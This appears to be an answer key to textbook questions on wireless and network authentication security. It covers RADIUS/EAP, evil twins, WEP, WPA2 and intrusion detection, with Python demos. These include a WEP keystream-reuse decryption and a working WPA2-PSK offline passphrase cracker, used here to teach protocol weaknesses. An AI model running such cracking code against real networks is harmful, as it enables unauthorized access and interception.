13. a) What standard do most central authentication servers follow?
Most central authentication servers are governed by the RADIUS standard.
b) How are EAP and RADIUS related in terms of functionality?
RADIUS is the AAA (authentication, authorization, and accounting) protocol spoken between the authenticator and the central server. In 802.1X deployments the EAP messages are carried inside RADIUS packets (as EAP-Message attributes), so RADIUS provides the transport and integrity protection between switch and server, and EAP provides the authentication dialogue between supplicant and server.
c) What authentication method does RADIUS use?
EAP, in 802.1X deployments. (RADIUS itself also supports simpler password methods such as PAP and CHAP, but EAP is what allows a choice of strong methods.)
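The division of labor just described (EAP between supplicant and server, RADIUS between switch and server, the switch relaying EAP without understanding it) is concrete enough to script. The Python exchange below is an added example, not the book's material or any vendor's code: a supplicant's EAP Response/Identity is wrapped by the authenticator in a RADIUS Access-Request with EAP-Message and Message-Authenticator attributes, the server verifies the HMAC-MD5 Message-Authenticator and answers with Access-Accept or Access-Reject carrying EAP Success or Failure, and the authenticator checks the Response Authenticator before relaying the EAP packet. The shared secret, user names and the decision rule (identity alone, standing in for a full EAP method) are constructed for the demo.

```python
import hashlib, hmac, os, struct

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_IDENTITY = 1
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTHENTICATOR = 1, 79, 80

def eap_packet(code, ident, eap_type=None, data=b""):
    """EAP packet (RFC 3748): Code, Identifier, Length, then Type + Type-Data for Request/Response."""
    body = (bytes([eap_type]) if eap_type is not None else b"") + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body

def attr(attr_type, value):
    return bytes([attr_type, 2 + len(value)]) + value

def radius_packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs

def parse_attrs(pkt):
    out, p = [], 20
    while p + 2 <= len(pkt):
        t, length = pkt[p], pkt[p + 1]
        if length < 2 or p + length > len(pkt):
            raise ValueError("malformed RADIUS attribute")
        out.append((t, pkt[p + 2:p + length])); p += length
    return out

def message_authenticator_ok(secret, pkt, request_authenticator=None):
    """HMAC-MD5 over the packet with the Message-Authenticator zeroed (RFC 2869 5.14).
    Replies are keyed over the Request Authenticator of the request they answer."""
    auth = request_authenticator or pkt[4:20]
    p = 20
    while p + 2 <= len(pkt):
        t, length = pkt[p], pkt[p + 1]
        if length < 2 or p + length > len(pkt):
            return False
        if t == ATTR_MESSAGE_AUTHENTICATOR and length == 18:
            zeroed = pkt[:4] + auth + pkt[20:p + 2] + b"\x00" * 16 + pkt[p + 18:]
            expected = hmac.new(secret, zeroed, hashlib.md5).digest()
            return hmac.compare_digest(expected, pkt[p + 2:p + 18])
        p += length
    return False          # Access-Requests carrying EAP-Message must include one (RFC 3579)

def sign_message_authenticator(secret, pkt, request_authenticator=None):
    """Fill in the zeroed Message-Authenticator, which these builders always place last."""
    auth = request_authenticator or pkt[4:20]
    return pkt[:-16] + hmac.new(secret, pkt[:4] + auth + pkt[20:], hashlib.md5).digest()

def authenticator_wrap(secret, ident, eap_from_supplicant, username):
    """Authenticator (switch): relay the supplicant's EAP packet, untouched, inside an Access-Request."""
    req_auth = os.urandom(16)                      # Request Authenticator: fresh random value
    attrs = (attr(ATTR_USER_NAME, username) + attr(ATTR_EAP_MESSAGE, eap_from_supplicant)
             + attr(ATTR_MESSAGE_AUTHENTICATOR, b"\x00" * 16))
    return sign_message_authenticator(secret, radius_packet(ACCESS_REQUEST, ident, req_auth, attrs))

def radius_server_handle(secret, request, allowed_users):
    """Central authentication server: check integrity, inspect the EAP payload, decide, answer."""
    if request[0] != ACCESS_REQUEST or not message_authenticator_ok(secret, request):
        return None                                # silently discard (RFC 2869 5.14)
    eap = dict(parse_attrs(request)).get(ATTR_EAP_MESSAGE, b"")
    identity = eap[5:] if len(eap) > 5 and eap[0] == EAP_RESPONSE and eap[4] == EAP_TYPE_IDENTITY else None
    # A real server now runs an EAP method (PEAP, EAP-TLS) via Access-Challenge round trips;
    # the demo decides on the identity alone.
    if identity in allowed_users:
        code, eap_out = ACCESS_ACCEPT, eap_packet(EAP_SUCCESS, eap[1])
    else:
        code, eap_out = ACCESS_REJECT, eap_packet(EAP_FAILURE, eap[1] if eap else 0)
    req_auth = request[4:20]
    attrs_out = attr(ATTR_EAP_MESSAGE, eap_out) + attr(ATTR_MESSAGE_AUTHENTICATOR, b"\x00" * 16)
    resp = sign_message_authenticator(secret, radius_packet(code, request[1], req_auth, attrs_out), req_auth)
    # Response Authenticator = MD5(Code|ID|Length|RequestAuth|Attributes|Secret)   (RFC 2865 section 3)
    resp_auth = hashlib.md5(resp[:4] + req_auth + resp[20:] + secret).digest()
    return resp[:4] + resp_auth + resp[20:]

def authenticator_unwrap(secret, request, response):
    """Authenticator: make sure the reply came from the server, then relay the EAP packet as-is."""
    if response is None:
        return None
    req_auth = request[4:20]
    expected = hashlib.md5(response[:4] + req_auth + response[20:] + secret).digest()
    if not hmac.compare_digest(expected, response[4:20]):
        return None
    if not message_authenticator_ok(secret, response, req_auth):
        return None
    return response[0], dict(parse_attrs(response)).get(ATTR_EAP_MESSAGE)   # code drives the port state

def run_exchange(username=b"alice", secret=b"constructed-shared-secret"):
    eap_resp = eap_packet(EAP_RESPONSE, 7, EAP_TYPE_IDENTITY, username)    # supplicant -> switch (EAPOL)
    request = authenticator_wrap(secret, 42, eap_resp, username)            # switch -> RADIUS server
    response = radius_server_handle(secret, request, {b"alice"})            # server -> switch
    return authenticator_unwrap(secret, request, response)                  # switch -> supplicant
```

The authenticator never parses the EAP payload, which is exactly why adding an EAP method requires changing only the supplicant and the server. The MD5-based authenticators are what RADIUS specifies; in practice the switch-to-server path should also be protected (RadSec over TLS, or at least a dedicated management VLAN), since the shared secret is all that protects the reply.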
4.6 Wireless Security
Wireless Attacks
14. a) What is the most common attack against wireless networks? Why?
The most common attack against wireless networks is unauthorized access, or connecting to a network without permission. It is common because it requires no special skill or tools: any device in radio range can attempt to associate, and an unprotected or weakly protected access point will let it.
b) Which IEEE standard governs WLAN transmission?
IEEE 802.11.
c) Which device acts as a relay between wired and wireless networks?
An access point.
d) What is the typical range of a WLAN?
Wireless 802.11 networks typically have a range of 30 to 100 meters extending in all directions from the AP.
e) What is the difference between an open network and a private network?
Open networks can be legally accessed by anyone, whereas private networks do not allow access unless it has been specifically authorized.
f) Who would set up a rogue access point? Why?
Rogue access points are unauthorized access points set up by individuals or departments with little or no security. They are typically set up by internal employees for convenience, without knowing the ramifications of an unsecured wireless AP.
g) Give examples of both internal and external harm caused by unauthorized wireless access.
Internally, attackers have greater access to internal information, resources, and other network traffic. They can covertly steal confidential information, read and record network traffic, alter network devices, or plant malware on targeted clients or servers. They may also have access to network shares that were assumed to be protected behind the firewall.
An attacker could anonymously download, upload, and store illegal content via the wireless network. Even worse, the network could be used as a launching pad for an external attack.
h) Are you liable if someone else uses your wireless network to commit a crime? Why, or why not?
At the time of this writing, it appears that you are likely not liable for crimes committed by criminals using your wireless network—if you attempted to secure it. However, it’s unknown if you could be liable for criminal acts performed through an unprotected network. In either case, your ISP can immediately discontinue your service.
Evil Twin Access Points
15. a) What man-in-the-middle attack is a danger for 802.11 WLANs?
The most dangerous man-in-the-middle attack for 802.11 WLANs is the evil twin access point. An evil twin is simply a PC (or small device) with software that lets it masquerade as a legitimate access point, usually by advertising the same SSID with a stronger signal. The evil twin passes traffic between the client and the legitimate access point transparently, retaining copies of important data exchanged between them. Because it sits in the middle during security setup as well as afterwards, it can capture credentials and, depending on the authentication method, the keying material needed to decrypt all traffic during that session.
b) Physically, what is an evil twin access point?
An evil twin access point is simply a PC that has software to allow it to masquerade as an access point.
c) What happens when the legitimate supplicant sends credentials to the legitimate access point?
The evil twin access point will intercept all traffic passing through it, including credentials and keys which will later on give it permission to decrypt and encrypt any messages passing through.
d) In what two types of attacks can the evil twin engage?
It can capture credentials transmissions and keys and it can also send packets of its own impersonating the victim client.
e) Are evil twin attacks frequent?
Yes
f) Where are they the most frequently encountered?
In public hot spots.
g) How can the danger of evil twin attacks be addressed?
The danger of evil twin attacks can be largely eliminated by requiring remote clients to establish VPN connections with VPN gateways before they may reach network resources. Remote access VPN setup authenticates with a pre-shared key (or certificates) held on the client and the VPN gateway, and this key is never transmitted during authentication, so the evil twin cannot copy credentials or keying information and sees only encrypted tunnel traffic. On the wireless link itself, enterprise authentication that validates the server's certificate (802.1X with PEAP or EAP-TLS, with certificate checking enforced on clients) addresses the same problem.
Wireless Denial of Service
16. a) How would a wireless DoS attack be carried out?
Wireless DoS attacks can be carried out by 1) flooding the frequency being used, 2) flooding the AP with too many packets, and 3) continually sending “disassociate” packets to all internal wireless clients.
b) What type of devices could be used to flood the transmission frequency for a WLAN?
Attackers can use common household items such as baby monitors, cordless phones, or Bluetooth devices to interfere with an 802.11 network. Attackers can also use commercial jamming devices.
c) What device could be used to identify a DoS flood if the entire frequency is being flooded by EMI?
Network administrators can use wireless spectrum analyzers to identify DoS floods. Spectrum analyzers record all signals, including packet transmissions, within a given radio frequency band.
d) What type of attack commands could be sent to cause a wireless DoS attack?
An attacker could use packet injection to send spoofed deauthenticate messages to the AP. The spoofed source addresses would correspond to each wireless client on the WLAN. The deauthenticate message says that the sender wants to terminate the authenticated connection. The victim must reauthenticate with the AP before it can communicate, and a continuous stream of such frames keeps it from ever doing so. Unless the network enforces 802.11w Protected Management Frames, deauthentication and disassociation frames are not authenticated, so the AP cannot distinguish the spoofed frames from genuine ones.
e) What would happen if a wireless network were flooded with CTS frames?
A flood of CTS frames with long transmission durations keeps other clients waiting, since every station honors the duration field and defers. A flood of RTS frames produces a flood of CTS frames from the AP. Both produce an effective DoS attack on the wireless network. Again, these control frames are not authenticated, and unlike management frames they are not protected by 802.11w.
Wireless LAN Security with 802.11i
17. a) Why is it impossible to extend 802.1X operation using EAP directly to WLANs?
EAP assumes that the connection between the supplicant and authenticator is secure, which is not the case in wireless transmission. Thus, 802.1X operation using EAP cannot be directly extended to WLANs.
b) What standard did the 802.11 Working Group create to extend 802.1X operation to WLANs with security for EAP?
802.11i
c) For 802.11i, distinguish between outer and inner authentication.
Outer authentication in 802.11i is the establishment of a TLS (formerly SSL) tunnel between the wireless client and the central authentication server, with the access point merely relaying the messages. The server presents a digital certificate and the client verifies it, so the client knows it is talking to the real server and all later messages are encrypted. Inner authentication follows: within the protection of the TLS tunnel, the wireless client authenticates itself to the central authentication server using an EAP method.
d) What authentication method or methods does outer authentication use?
Outer authentication uses SSL/TLS, with the authentication server authenticated by its digital certificate.
e) What two extended EAP protocols are popular today?
EAP-TLS and PEAP.
f) Distinguish between their options for inner authentication.
EAP-TLS has no separate inner method: the client authenticates with its own digital certificate during the TLS handshake itself, so both sides need certificates. With PEAP, only the server needs a certificate, and the client can use any method specified in the EAP standard inside the tunnel, ranging from passwords (typically MS-CHAPv2) through digital certificates. In both cases the client must actually validate the server's certificate; clients configured to skip that check are exactly what an evil twin exploits.
g) Is 802.11i security strong? Explain.
802.11i security is very strong. 802.11i not only provides authentication, but it supplies all of the protections expected in a strong cryptographic security system. For confidentiality and message integrity it uses AES with a 128-bit key in CCM mode (CCMP), a robust symmetric cipher. Keys are not permanent: a four-way handshake after authentication derives fresh per-session keys from the master key, and the protocol provides for automatic and frequent rekeying.
Core Wireless Security Protocols
Wired Equivalent Privacy (WEP)
18. a) What was the first core wireless security standard?
Wired equivalent privacy (WEP).
b) What encryption algorithm does it use?
WEP uses RC4, a stream cipher.
c) Why are permanent shared keys undesirable?
Permanent shared keys are undesirable because in large firms that have many access points sharing the same WEP key, the practical difficulties in changing everyone’s key means that shared keys are almost never changed. In addition, because “everybody knows” the key, people share the key freely even when they are told not to. Worst of all, if a company fires a disgruntled employee, it must change the key on every access point for which the employee may know the key. In many cases, changing the key will be prohibitively expensive and would inconvenience many workers.
d) What per-frame key does a WEP computer or access point use to encrypt when it transmits?
WEP encrypts each frame with a per-frame key that consists of the shared RC4 key plus a 24-bit initialization vector (IV) that is different for each frame.
e) What mistake did the 802.11 Working Group make in selecting the length of the IV?
The 802.11 Working Group's mistake was making IVs too short (only 24 bits long). There are only 16,777,216 possible IVs, so a busy access point cycles through them in hours and must reuse IVs, and each reuse means two frames encrypted with the same RC4 keystream. Worse, because the IV is simply prepended to the fixed secret key, certain IV values leak information about the key bytes (the Fluhrer, Mantin, and Shamir weakness), which is what the practical WEP-cracking tools exploit.
f) How long may WEP take to crack today?
If a company encrypts a large enough volume of traffic with the same secret key, the attacker can often compute the entire secret key in two or three minutes. Attackers do not even have to wait for enough traffic: they can replay captured ARP requests to make the access point generate tens of thousands of new encrypted frames in a minute or two.
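The two consequences of the short IV, keystream reuse and a predictable per-frame key, can be demonstrated with nothing more than RC4 itself. The Python code below is an added example, not the book's: it implements RC4, encrypts two constructed frames under the same WEP key and IV, shows that a single known plaintext recovers the keystream and therefore the other frame, and computes how many random IVs it takes before a repeat becomes more likely than not. The 40-bit key, IV and frame contents are made up for the demonstration; the CRC-32 integrity value that real WEP appends is omitted.

```python
def rc4_keystream(key, n):
    """Plain RC4 (key scheduling + PRGA); returns n keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(shared_key, iv, plaintext):
    """WEP: per-frame RC4 key = 24-bit IV || shared key. The IV travels in the clear ahead of the
    ciphertext so the receiver can rebuild the same key. (ICV/CRC-32 omitted.)"""
    assert len(iv) == 3
    keystream = rc4_keystream(iv + shared_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, keystream))

def xor_of_plaintexts(frame_a, frame_b):
    """Two frames under one IV share a keystream: C_a XOR C_b = P_a XOR P_b, no key needed."""
    assert frame_a[:3] == frame_b[:3], "frames must reuse the IV"
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))

def recover_with_known_plaintext(known_frame, known_plaintext, target_frame):
    """Knowing one frame's plaintext (e.g. the fixed LLC/SNAP header on every IP frame) yields the
    keystream for that IV, which then decrypts any other frame sent under it."""
    keystream = bytes(c ^ p for c, p in zip(known_frame[3:], known_plaintext))
    return bytes(c ^ k for c, k in zip(target_frame[3:], keystream))

def frames_until_collision_likely(iv_bits=24, target=0.5):
    """Birthday bound: frames with random IVs after which a repeated IV has probability >= target."""
    space, p_no_repeat, n = 1 << iv_bits, 1.0, 0
    while 1.0 - p_no_repeat < target:
        p_no_repeat *= (space - n) / space
        n += 1
    return n

def run_demo():
    key = bytes.fromhex("0f3ac98122")                   # 40-bit WEP key, constructed for the demo
    iv = bytes.fromhex("0a1b2c")
    p1 = b"GET /admin?user=alice&pw=hunter2"           # the frame the attacker wants
    p2 = b"GET /index.html HTTP/1.1 keepali"           # assumed known to the attacker
    f1, f2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    return recover_with_known_plaintext(f2, p2, f1)
```

Cards that simply counted IVs upward avoided random collisions but repeated the entire sequence after 2^24 frames; the key-recovery attacks that crack WEP in minutes build on the weak-IV problem rather than on the collision shown here.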
g) Should corporations today use WEP for security today?
No. Given how easily and quickly WEP can be cracked, it makes no sense for corporations to use WEP today. In fact, it only gives a false sense of security, and this may be worse than no security at all.
Wi-Fi Protected Access (WPA™)
19. a) What prompted the Wi-Fi Alliance to create WPA?
The inadequacy of WEP (which can be cracked in minutes) caused many companies to freeze WLAN deployment and in some cases turn off existing WLANs. This wide scale lack of trust in WLAN security prompted the Wi-Fi Alliance to create WPA.
b) Compare WPA and 802.11i security.
WPA uses the relatively weak RC4 cipher in encryption for confidentiality and uses the only moderately strong Temporal Key Integrity Protocol (TKIP) for keying and rekeying. Although there have been no published cracks for WPA as a whole, at least at the time of this writing, TKIP has been partially cracked, and security professionals are uncomfortable with WPA’s security methods.
c) What does the Wi-Fi Alliance call 802.11i?
WPA2
d) Despite its relative security weaknesses, why do many companies continue to use WPA instead of 802.11i?
Companies still use WPA instead of WPA2 to avoid the cost of reconfiguring all access points and wireless clients to support WPA2.
Pre-Shared Key (PSK) Mode

20. a) Why is 802.1X mode unsuitable for homes and small offices?
Because the use of a central authentication server is very expensive.
b) What mode was created for homes or very small businesses with a single access point?
PSK/personal mode
c) How do users in this mode authenticate themselves to the access point?
In PSK mode, users authenticate themselves to the access point with a single shared key (the pre-shared key, PSK) that every client and the access point derive from the same passphrase.
d) Why is using a shared initial key not dangerous?
The PSK itself is never transmitted. It is used only briefly, when a client first authenticates itself to the access point: the two sides run a four-way handshake in which each proves knowledge of the PSK, and they derive fresh session keys that are used for the rest of the session. The handshake messages are sent in the clear, however, and an attacker who captures them can test candidate passphrases offline against them. The shared initial key is therefore safe only if the passphrase is strong enough that such guessing is impractical.
e) How are PSK/personal keys generated?
The administrator types a passphrase into every client and into the access point. Each device derives the same 256-bit key from the passphrase and the SSID (in WPA2, with PBKDF2 and 4,096 iterations), so the passphrase is the only secret.
f) How long must passphrases be for adequate security?
Passphrases must be at least 20 characters long for adequate security, but preferably longer, and they should not be dictionary words or phrases, because a captured handshake can be used for offline guessing.
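Why the passphrase length matters follows directly from how the PSK is used. The Python code below is an added example, not from the original text: it derives the PMK from a passphrase and SSID with PBKDF2 as 802.11i specifies, expands it to the PTK with the four-way handshake inputs, computes the MIC on a constructed handshake message 2, and then runs the offline dictionary attack an eavesdropper would run against a captured handshake. The SSID, MAC addresses, nonces, passphrase and word list are all constructed; the EAPOL-Key frame has minimal field values and no key data.

```python
import hashlib, hmac, struct

MIC_OFFSET = 81                # offset of the 16-byte Key MIC inside an EAPOL-Key frame

def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated, truncated."""
    return b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK, both MAC addresses and both handshake nonces; the KCK is its first 16 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(snonce, mic=b"\x00" * 16):
    """Constructed handshake message 2 (client -> AP): minimal field values, no key data."""
    body = (b"\x02"                       # descriptor type: RSN (802.11i)
            + b"\x01\x0a"                 # key info: MIC present, pairwise, version 2 (HMAC-SHA1 / AES)
            + b"\x00\x10"                 # key length 16
            + b"\x00" * 7 + b"\x01"       # replay counter 1
            + snonce                      # SNonce (32 bytes)
            + b"\x00" * 32                # key IV (16), key RSC (8), key ID (8)
            + mic + b"\x00\x00")          # key MIC (16), key data length 0
    return b"\x02\x03" + struct.pack("!H", len(body)) + body    # EAPOL v2, type 3 = EAPOL-Key

def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: everything needed except the passphrase is in the captured frames."""
    target_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target_mic):
            return candidate
    return None

def run_demo():
    """AP and client share the passphrase; the attacker captures MACs, nonces and msg2 and guesses offline."""
    ssid, true_passphrase = "CorpGuest", "sunshine1"              # constructed, deliberately weak
    ap_mac, sta_mac = bytes.fromhex("001122aabbcc"), bytes.fromhex("665544ddeeff")
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))     # fixed instead of random, for the demo
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))  # client signs msg2 with the real key
    wordlist = ["password", "letmein", "CorpGuest2013", "sunshine1", "correct horse battery staple"]
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)
```

PBKDF2 with 4,096 iterations costs a few milliseconds per guess on a CPU and far less on a GPU, so a passphrase drawn from a dictionary or a short pattern falls quickly, while a random 20-character passphrase does not. WPA3's SAE handshake removes the offline-guessing exposure; on WPA2 the passphrase is the only defense.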
Wireless Intrusion Detection Systems
21. a) What is the purpose of a wireless IDS?
It is to collect data from wireless access points that can be used to detect attacks.
b) How do wireless IDSs get their data?
In a centralized wireless intrusion detection system, each access point becomes a wireless IDS agent, sending appropriate information to the central wireless IDS console. The console transfers the data to an IDS database. It also sorts through data in the database to find indications of problems.
c) What is a rogue access point?
Unauthorized access points set up by individuals or departments.
d) What are the two alternatives to using a centralized wireless IDS?
One is not to worry about intrusion detection and the other is to walk around the building frequently with a laptop that has wireless IDS software.
e) Why are they not attractive?
Ignoring threats raises the probability that they will be successful. Walking around is likely to require a prohibitive amount of labor, and it cannot catch threats that appear after the wireless security administrator has checked a part of the site for threats. Nor are they likely to catch evil twin access points, which only operate occasionally and so may not be operating when the wireless administrator is sweeping the building for concerns.
False 802.11 Security Measures
22. a) Does the use of spread spectrum transmission in 802.11 create security?
No. Military transmission uses spread spectrum operation in a way that provides security, with secret spreading codes or hopping sequences. Civilian spread spectrum transmission does not: the 802.11 spreading codes and channel plans are fixed by the public standard, so any 802.11 radio can receive the signal.
b) What are SSIDs?
Each access point (more precisely, each wireless network) has a Service Set Identifier (SSID), a name of up to 32 characters that clients use to pick the network they want to join. Clients must know the SSID to connect to the access point, but it is a label, not a secret.
c) Does turning off SSID broadcasting offer real security? Explain.
No. Turning off SSID broadcasting would seem to offer security. However, even if the access point omits the SSID from its beacons, the SSID is still transmitted in the clear in the probe requests and association requests that clients send whenever they connect, so anyone sniffing the channel learns it as soon as one legitimate client joins. Hacker software reads it easily.
d) What are MAC access control lists?
A MAC access control list is a list of pre-approved stations allowed to use the access point.
e) Do they offer real security? Explain.
MAC access control lists rely on MAC addresses that are transmitted in the clear for every 802.11 frame. MAC addresses can be sniffed and spoofed by hackers. Thus, MAC access control lists offer no significant security.